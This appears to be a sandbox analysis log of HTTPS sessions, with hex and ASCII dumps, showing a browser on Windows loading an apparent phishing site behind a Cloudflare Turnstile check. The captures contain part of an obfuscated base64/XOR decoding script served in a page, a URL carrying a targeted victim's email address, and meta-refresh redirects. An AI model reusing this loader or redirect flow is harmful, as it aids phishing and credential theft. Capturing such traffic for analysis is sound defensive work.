                                                              2024-07-03 07:41:01 UTC1213OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 67 5a 32 36 69 41 50 56 62 4f 75 6f 47 37 66 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 51 58 6c 34 6c 68 6a 45 44 63 78 77 64 77 47 4f 6b 4c 4d 65 38 47 36 4f 34 77 6a 6c 4f 4b 77 75 39 36 50 63 78 7a 61 49 57 39 34 4a 5f 42 2d 6e 31 55 39 6e 34 6f 43 72 34 66 52 64 58 4c 38 4f 66 4c 57 77 37 55 74 56 48 4e 4c 55 38 52 6d 6a 4d 6b 46 42 38 53 6a 36 6f 41 78 5f 71 37 46 79 6d 58 44 30 71 47 43 46 4b 59 32 71 55 4d 4c 51 6f 5f 61 59 55 6c 68 5a 68 47 77 4c 39 7a 31 65 75 32 35 58 42 6d 32 4a 45 6f 78 47 51 31 36 36 6b 74 71
                                                              Data Ascii: ------WebKitFormBoundarygZ26iAPVbOuoG7fSContent-Disposition: form-data; name="cf-turnstile-response"0.QXl4lhjEDcxwdwGOkLMe8G6O4wjlOKwu96PcxzaIW94J_B-n1U9n4oCr4fRdXL8OfLWw7UtVHNLU8RmjMkFB8Sj6oAx_q7FymXD0qGCFKY2qUMLQo_aYUlhZhGwL9z1eu25XBm2JEoxGQ166ktq
                                                              2024-07-03 07:41:02 UTC999INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:02 GMT
                                                              Content-Type: application/json
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: no-cache, private
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Po8Yt%2BG4KWohRfUkdNT%2FT4Uh4jO9S5xDPM2raA9o8J8PUM%2F7eZGsLaV0ra%2BYUWmdNdL7wBVy8OaqnSfy1isvl8liArfsXXNV3YJQTFnXoSPjx0cESeSLE87diCWgfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6ImdBU0dxSWJsZjlwMDU3aEx6ZEd1VUE9PSIsInZhbHVlIjoib2tVdVZNZU1saFAwM1dSRDRVajVVTEVGOFVJUGZ3bG5MOEhhRGRXK0E1ckwwTXdqOU9pVW91Tk1JVTI4Szk0WE00Q1hDdmtkWFdmNFR6UU9nVXBrUjhUdFFjUG92amFzc0l5Z0t3ZlhQQm0vS1p4UCtqN1BBQXQzTEZBNWdpcWwiLCJtYWMiOiI3Nzg0Zjg1NmMyOTlkNGY4NzcxMjE5MTYxN2RhMzQ2YTRhMDNjOWU0OGI5ZmFhNDUzZGE0ZTE1MTkzNDY5YzA5IiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 09:41:02 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                              2024-07-03 07:41:02 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 51 77 5a 47 6f 32 62 55 39 79 65 6d 39 77 52 6d 68 57 53 48 46 6b 55 46 46 44 53 30 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 58 46 36 55 47 64 58 4c 32 30 32 63 6b 4a 7a 5a 47 6f 72 4e 56 5a 72 4c 30 64 70 62 54 68 7a 61 58 45 7a 4e 31 42 54 55 47 70 79 4d 47 68 6a 61 6d 56 78 4d 33 49 7a 65 6c 67 33 54 44 52 76 51 57 77 31 4d 6e 68 58 59 56 49 7a 56 31 4a 35 55 31 42 78 4c 32 68 6d 56 33 52 45 59 32 78 5a 55 47 39 69 52 6e 4a 7a 61 33 55 35 64 6e 5a 4a 5a 30 46 4f 52 57 51 30 63 54 56 73 4e 6d 4a 61 55 6c 4e 4b 53 32 56 31 59 6c 4e 78 5a 46 6c 57 59 6e 59 79 63 56 6c 6b 53 6b 6c 71 51 6d 46 43 54 45 6c 35 4e 44 42 31 54 56 59
                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InQwZGo2bU9yem9wRmhWSHFkUFFDS0E9PSIsInZhbHVlIjoiaXF6UGdXL202ckJzZGorNVZrL0dpbThzaXEzN1BTUGpyMGhjamVxM3Izelg3TDRvQWw1MnhXYVIzV1J5U1BxL2hmV3REY2xZUG9iRnJza3U5dnZJZ0FORWQ0cTVsNmJaUlNKS2V1YlNxZFlWYnYycVlkSklqQmFCTEl5NDB1TVY
                                                              2024-07-03 07:41:02 UTC26INData Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a
                                                              Data Ascii: 14{"status":"success"}
                                                              2024-07-03 07:41:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              34192.168.2.662914188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:02 UTC1463OUTGET /2DUx/ HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              Cache-Control: max-age=0
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              sec-ch-ua-platform: "Windows"
                                                              Upgrade-Insecure-Requests: 1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: navigate
                                                              Sec-Fetch-User: ?1
                                                              Sec-Fetch-Dest: document
                                                              Referer: https://vkwek.ckyucle.com/2DUx/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6ImdBU0dxSWJsZjlwMDU3aEx6ZEd1VUE9PSIsInZhbHVlIjoib2tVdVZNZU1saFAwM1dSRDRVajVVTEVGOFVJUGZ3bG5MOEhhRGRXK0E1ckwwTXdqOU9pVW91Tk1JVTI4Szk0WE00Q1hDdmtkWFdmNFR6UU9nVXBrUjhUdFFjUG92amFzc0l5Z0t3ZlhQQm0vS1p4UCtqN1BBQXQzTEZBNWdpcWwiLCJtYWMiOiI3Nzg0Zjg1NmMyOTlkNGY4NzcxMjE5MTYxN2RhMzQ2YTRhMDNjOWU0OGI5ZmFhNDUzZGE0ZTE1MTkzNDY5YzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InQwZGo2bU9yem9wRmhWSHFkUFFDS0E9PSIsInZhbHVlIjoiaXF6UGdXL202ckJzZGorNVZrL0dpbThzaXEzN1BTUGpyMGhjamVxM3Izelg3TDRvQWw1MnhXYVIzV1J5U1BxL2hmV3REY2xZUG9iRnJza3U5dnZJZ0FORWQ0cTVsNmJaUlNKS2V1YlNxZFlWYnYycVlkSklqQmFCTEl5NDB1TVYiLCJtYWMiOiJjMjc3MjYyMWI0NjU2MzIxY2M2NjRmMzU1NWJlMWY3MjhiZWJkOGQzMWIyMjMwYzdjNjZkNzY2MmVkM2VmZGM1IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:03 UTC999INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:03 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: no-cache, private
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=09Ix1lFnqEJycRPiG5AIT6Rm1QyRgmnx0EGBDCOSUp5ZuNXAlzBJdUcBbtVmwpED4wIiQUp2BYOxyRamSFpTef5ZQ5oQ2yi15JGso1xEwS0abd80jnbnVvbCtWbSfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IjIyaWZWVjlWK2x3OHpRZTExOTYyY0E9PSIsInZhbHVlIjoiWHNialhqU2VsQU5XaEc5Z0tBTC9Xc2FJL1Y5Z2VZbHFWVHgxMWh0cFhXQTVvd3BOd2hDa0p6NzNmcXh1YUlQa3lrL3ZuYURJbUo3cXJLZkZJOWhiblIxcHIzQTFjb3lNMTNWdkVpWmJ4L1FwMmVUYU9JMVk2bGwxczhzWjJBV1ciLCJtYWMiOiJhMWUwOGM3YTg1MDZjYTE2YjM2MmFjOWZlMjZlYWE0NGVhNWZmNDRjOWJiYjIzYTEyMWZjYjA1ZWJiZTljOTdlIiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 09:41:03 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                              2024-07-03 07:41:03 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 42 69 55 33 68 77 52 57 5a 44 4d 6d 6b 33 61 30 77 35 56 56 64 72 61 6b 31 56 64 47 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 30 70 47 52 45 4a 4a 4d 57 45 33 55 6b 4e 4d 56 55 73 72 52 58 4d 72 59 6a 6c 77 53 55 68 51 65 69 74 31 53 46 42 4a 5a 6c 46 75 64 6c 6c 43 51 54 42 79 64 55 4a 55 4e 45 39 70 4e 6c 68 4c 51 31 42 56 57 53 39 54 65 57 46 73 4d 58 56 6a 57 53 39 4e 64 6c 52 71 59 6b 74 7a 62 56 4e 57 54 46 52 45 62 56 59 31 4d 44 52 49 54 32 38 78 57 44 4d 76 65 6d 5a 6d 64 69 39 35 51 57 55 78 4d 6e 42 68 4d 44 64 36 59 6a 4e 7a 59 79 74 6f 52 32 5a 49 4c 33 6f 79 5a 6a 64 48 53 46 68 6b 4e 44 68 57 63 57 6c 30 4d 46 6f
                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InBiU3hwRWZDMmk3a0w5VVdrak1VdGc9PSIsInZhbHVlIjoiN0pGREJJMWE3UkNMVUsrRXMrYjlwSUhQeit1SFBJZlFudllCQTBydUJUNE9pNlhLQ1BVWS9TeWFsMXVjWS9NdlRqYktzbVNWTFREbVY1MDRIT28xWDMvemZmdi95QWUxMnBhMDd6YjNzYytoR2ZIL3oyZjdHSFhkNDhWcWl0MFo
                                                              2024-07-03 07:41:03 UTC1369INData Raw: 37 31 34 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 64 45 56 61 4a 77 70 51 77 64 28 79 74 59 6f 4b 67 54 63 75 4f 2c 20 47 56 68 4f 7a 6f 57 59 48 75 29 20 7b 0d 0a 6c 65 74 20 67 79 6c 46 4f 6f 52 74 4d 6c 20 3d 20 27 27 3b 0d 0a 79 74 59 6f 4b 67 54 63 75 4f 20 3d 20 61 74 6f 62 28 79 74 59 6f 4b 67 54 63 75 4f 29 3b 0d 0a 6c 65 74 20 52 65 54 4e 4e 43 4c 48 58 50 20 3d 20 47 56 68 4f 7a 6f 57 59 48 75 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 79 74 59 6f 4b 67 54 63 75 4f 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 67 79 6c 46 4f 6f 52 74 4d 6c 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 79 74 59 6f 4b 67 54 63 75 4f 2e 63 68 61 72 43 6f
                                                              Data Ascii: 714<script>function dEVaJwpQwd(ytYoKgTcuO, GVhOzoWYHu) {let gylFOoRtMl = '';ytYoKgTcuO = atob(ytYoKgTcuO);let ReTNNCLHXP = GVhOzoWYHu.length;for (let i = 0; i < ytYoKgTcuO.length; i++) { gylFOoRtMl += String.fromCharCode(ytYoKgTcuO.charCo
                                                              2024-07-03 07:41:03 UTC450INData Raw: 42 7a 77 73 42 7a 70 6f 4f 77 67 68 46 77 78 34 52 47 73 49 47 69 46 48 65 43 6c 50 45 44 41 69 66 6a 77 58 52 41 39 45 53 57 6c 46 62 67 35 74 43 6b 63 4f 46 55 6b 71 4b 6d 34 4a 64 6e 74 51 43 41 39 57 66 42 5a 71 66 47 39 32 46 53 6c 55 50 7a 34 65 4c 7a 38 62 66 7a 4a 6c 4b 56 39 64 59 57 4e 7a 5a 6e 59 41 4d 31 77 4e 42 77 45 50 4a 41 4d 6a 43 42 34 53 52 47 31 57 59 7a 30 7a 4f 67 56 38 44 32 6c 61 53 32 4e 7a 5a 69 45 41 4f 78 41 4c 4a 30 55 76 50 43 55 33 48 54 77 62 43 6e 34 44 4d 54 59 67 64 6c 52 31 41 77 30 2b 44 79 77 6b 61 44 6f 47 4e 68 55 51 4f 51 51 74 66 54 59 33 48 54 30 61 42 54 30 4f 65 46 35 4d 64 6b 6c 31 56 42 6c 64 59 57 4e 7a 5a 6e 59 41 4d 31 77 4e 42 77 45 50 4a 41 4d 6a 43 42 34 53 52 48 46 57 66 6e 4d 6f 49 77 55 35 58 52 39
                                                              Data Ascii: BzwsBzpoOwghFwx4RGsIGiFHeClPEDAifjwXRA9ESWlFbg5tCkcOFUkqKm4JdntQCA9WfBZqfG92FSlUPz4eLz8bfzJlKV9dYWNzZnYAM1wNBwEPJAMjCB4SRG1WYz0zOgV8D2laS2NzZiEAOxALJ0UvPCU3HTwbCn4DMTYgdlR1Aw0+DywkaDoGNhUQOQQtfTY3HT0aBT0OeF5Mdkl1VBldYWNzZnYAM1wNBwEPJAMjCB4SRHFWfnMoIwU5XR9
                                                              2024-07-03 07:41:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              35192.168.2.662916188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:02 UTC1099OUTGET /wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6ImdBU0dxSWJsZjlwMDU3aEx6ZEd1VUE9PSIsInZhbHVlIjoib2tVdVZNZU1saFAwM1dSRDRVajVVTEVGOFVJUGZ3bG5MOEhhRGRXK0E1ckwwTXdqOU9pVW91Tk1JVTI4Szk0WE00Q1hDdmtkWFdmNFR6UU9nVXBrUjhUdFFjUG92amFzc0l5Z0t3ZlhQQm0vS1p4UCtqN1BBQXQzTEZBNWdpcWwiLCJtYWMiOiI3Nzg0Zjg1NmMyOTlkNGY4NzcxMjE5MTYxN2RhMzQ2YTRhMDNjOWU0OGI5ZmFhNDUzZGE0ZTE1MTkzNDY5YzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InQwZGo2bU9yem9wRmhWSHFkUFFDS0E9PSIsInZhbHVlIjoiaXF6UGdXL202ckJzZGorNVZrL0dpbThzaXEzN1BTUGpyMGhjamVxM3Izelg3TDRvQWw1MnhXYVIzV1J5U1BxL2hmV3REY2xZUG9iRnJza3U5dnZJZ0FORWQ0cTVsNmJaUlNKS2V1YlNxZFlWYnYycVlkSklqQmFCTEl5NDB1TVYiLCJtYWMiOiJjMjc3MjYyMWI0NjU2MzIxY2M2NjRmMzU1NWJlMWY3MjhiZWJkOGQzMWIyMjMwYzdjNjZkNzY2MmVkM2VmZGM1IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:03 UTC575INHTTP/1.1 404 Not Found
                                                              Date: Wed, 03 Jul 2024 07:41:03 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y2XypR95Qs7VWdniFUiARnjZ44B9gUvUfBVwLe4MpOYwxw4ib2rjoDCKiWeXOu8bdIEFyOxSpEu4wlwqHJFE6jmg3VyGvkB0%2FYfJuE9w7IHxEVE5Ayhduj9KpAsk5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b1cc895428e-EWR
                                                              2024-07-03 07:41:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              36192.168.2.662915188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:03 UTC1450OUTGET /2DUx/?W-crystal.begin@schulergroup.com HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              sec-ch-ua-platform: "Windows"
                                                              Upgrade-Insecure-Requests: 1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: navigate
                                                              Sec-Fetch-Dest: document
                                                              Referer: https://vkwek.ckyucle.com/2DUx/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjIyaWZWVjlWK2x3OHpRZTExOTYyY0E9PSIsInZhbHVlIjoiWHNialhqU2VsQU5XaEc5Z0tBTC9Xc2FJL1Y5Z2VZbHFWVHgxMWh0cFhXQTVvd3BOd2hDa0p6NzNmcXh1YUlQa3lrL3ZuYURJbUo3cXJLZkZJOWhiblIxcHIzQTFjb3lNMTNWdkVpWmJ4L1FwMmVUYU9JMVk2bGwxczhzWjJBV1ciLCJtYWMiOiJhMWUwOGM3YTg1MDZjYTE2YjM2MmFjOWZlMjZlYWE0NGVhNWZmNDRjOWJiYjIzYTEyMWZjYjA1ZWJiZTljOTdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBiU3hwRWZDMmk3a0w5VVdrak1VdGc9PSIsInZhbHVlIjoiN0pGREJJMWE3UkNMVUsrRXMrYjlwSUhQeit1SFBJZlFudllCQTBydUJUNE9pNlhLQ1BVWS9TeWFsMXVjWS9NdlRqYktzbVNWTFREbVY1MDRIT28xWDMvemZmdi95QWUxMnBhMDd6YjNzYytoR2ZIL3oyZjdHSFhkNDhWcWl0MFoiLCJtYWMiOiJhYjVkOGVmOWMzMjc3OWEyOTNkMjQ2YWJjZDIxNzM0N2MzYTBiOWRlYWM2M2MyNmU4MTA5YTJkMGYyYmUyZTQyIiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:03 UTC1149INHTTP/1.1 302 Found
                                                              Date: Wed, 03 Jul 2024 07:41:03 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: no-cache, private
                                                              Location: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Plc9jXmVs0XTT4y348f%2BcRTh%2Btt9fPai0%2FOx3O08UijslYVeuQCg0g%2BdsGlYBRG1ORKekFis%2Fk55BMLBUbE4k0vOUEwDB2Xde%2FGsYZZfADTFRSkQ3Q2RehAyRmQAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6Ikp6bWxUaVJGcWJad3NFeGtVT1Y2QlE9PSIsInZhbHVlIjoiOTlSQXB3ektMQi9UZjNWdVRycGN0WU9GeHhmU1FpUFhGajZ0cUtwQ1lmVWc4Q2lHZG9rbHZSeEVjTWNrL2JwbEllOE5ZODFGRUY1WDhjc0NUM2NXRmN2akF1MDdiK3RiL0RsSk40NkUzS2FLb1RWc2V4K2M4UE5ubngyRFM5T3oiLCJtYWMiOiJkNjU4ZThiOGIzNWFkYmVhMWM1OTVkZTBiZGEyNzgyMmIzY2IzYWJjOTczYWYxZGI5YTczMzM2MGY4ZTc4OWRmIiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 09:41:03 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                              2024-07-03 07:41:03 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 59 78 5a 30 31 70 54 54 52 58 4e 46 52 72 55 6c 4e 4f 4e 69 74 34 5a 6b 6b 33 59 57 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 30 4a 43 4e 55 4e 36 63 6b 46 7a 55 47 49 32 61 6b 78 31 54 32 55 31 63 6b 4a 36 55 57 4e 31 4d 56 42 61 64 56 6f 33 65 6c 4a 59 5a 79 74 70 4b 31 6c 51 56 30 52 46 54 56 56 75 62 6d 56 77 52 48 5a 57 59 6a 6b 77 57 6b 31 4d 63 7a 42 4f 64 6d 31 76 55 47 4a 49 55 56 52 4b 54 6d 78 57 64 6a 46 43 55 32 31 32 64 6e 46 44 4e 46 46 43 54 7a 68 55 54 33 52 42 64 7a 52 4f 64 33 6b 79 4e 6b 55 31 52 57 64 33 52 46 5a 56 61 30 4a 45 4d 56 46 6d 59 57 68 78 59 56 42 6d 55 6c 42 4b 56 79 74 46 51 54 6c 70 62 6d 49
                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InYxZ01pTTRXNFRrUlNONit4Zkk3YWc9PSIsInZhbHVlIjoiM0JCNUN6ckFzUGI2akx1T2U1ckJ6UWN1MVBadVo3elJYZytpK1lQV0RFTVVubmVwRHZWYjkwWk1MczBOdm1vUGJIUVRKTmxWdjFCU212dnFDNFFCTzhUT3RBdzROd3kyNkU1RWd3RFZVa0JEMVFmYWhxYVBmUlBKVytFQTlpbmI
                                                              2024-07-03 07:41:03 UTC745INData Raw: 32 65 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 76 6b 77 65 6b 2e 63 6b 79 75 63 6c 65 2e 63 6f 6d 2f 62 74 78 72 68 78 7a 6f 65 76 6d 68 6a 78 67 6b 6f 72 72 4e 50 4a 59 50 4a 44 48 4c 4d 4b 57 49 44 48 57 59 48 54 4e 57 58 45 3f 64 69 73 79 72 79 77 6d 6e 75 6a 6a 78 68 71 65 77 69 69 65 63 78 30 37 36 34 39 33 34 35 33 30 32 30 36 34 38 63 63 63 78 65 64 66 70 77 6f 63 66 7a 6b 66 72 73 27 22 20 2f 3e 0a 0a 20 20
                                                              Data Ascii: 2e2<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs'" />
                                                              2024-07-03 07:41:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              37192.168.2.662917188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:03 UTC1509OUTGET /btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              Upgrade-Insecure-Requests: 1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: navigate
                                                              Sec-Fetch-Dest: document
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              sec-ch-ua-platform: "Windows"
                                                              Referer: https://vkwek.ckyucle.com/2DUx/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6Ikp6bWxUaVJGcWJad3NFeGtVT1Y2QlE9PSIsInZhbHVlIjoiOTlSQXB3ektMQi9UZjNWdVRycGN0WU9GeHhmU1FpUFhGajZ0cUtwQ1lmVWc4Q2lHZG9rbHZSeEVjTWNrL2JwbEllOE5ZODFGRUY1WDhjc0NUM2NXRmN2akF1MDdiK3RiL0RsSk40NkUzS2FLb1RWc2V4K2M4UE5ubngyRFM5T3oiLCJtYWMiOiJkNjU4ZThiOGIzNWFkYmVhMWM1OTVkZTBiZGEyNzgyMmIzY2IzYWJjOTczYWYxZGI5YTczMzM2MGY4ZTc4OWRmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InYxZ01pTTRXNFRrUlNONit4Zkk3YWc9PSIsInZhbHVlIjoiM0JCNUN6ckFzUGI2akx1T2U1ckJ6UWN1MVBadVo3elJYZytpK1lQV0RFTVVubmVwRHZWYjkwWk1MczBOdm1vUGJIUVRKTmxWdjFCU212dnFDNFFCTzhUT3RBdzROd3kyNkU1RWd3RFZVa0JEMVFmYWhxYVBmUlBKVytFQTlpbmIiLCJtYWMiOiIwMGIyZjU4YWRjZTlkNDA1OWM4YjY5YmVmZTQ3ZDUyZTk5OGFhNDEzNTI5NDFjZDQyODVhMzdjMmEyODViYTRjIiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:04 UTC1005INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:04 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: no-cache, private
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sUxnslQlO%2FZwnwxgLngWfB4QJVcPfZUI1FOnkcZyE7QxCxNaYh0WZlqrKxH7At6MiaojekQRwo6mRtkErKtPV7%2Bh2WRT6D%2FWdf3PrQ2sjvxioZi9qetNaU6H5vSs8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
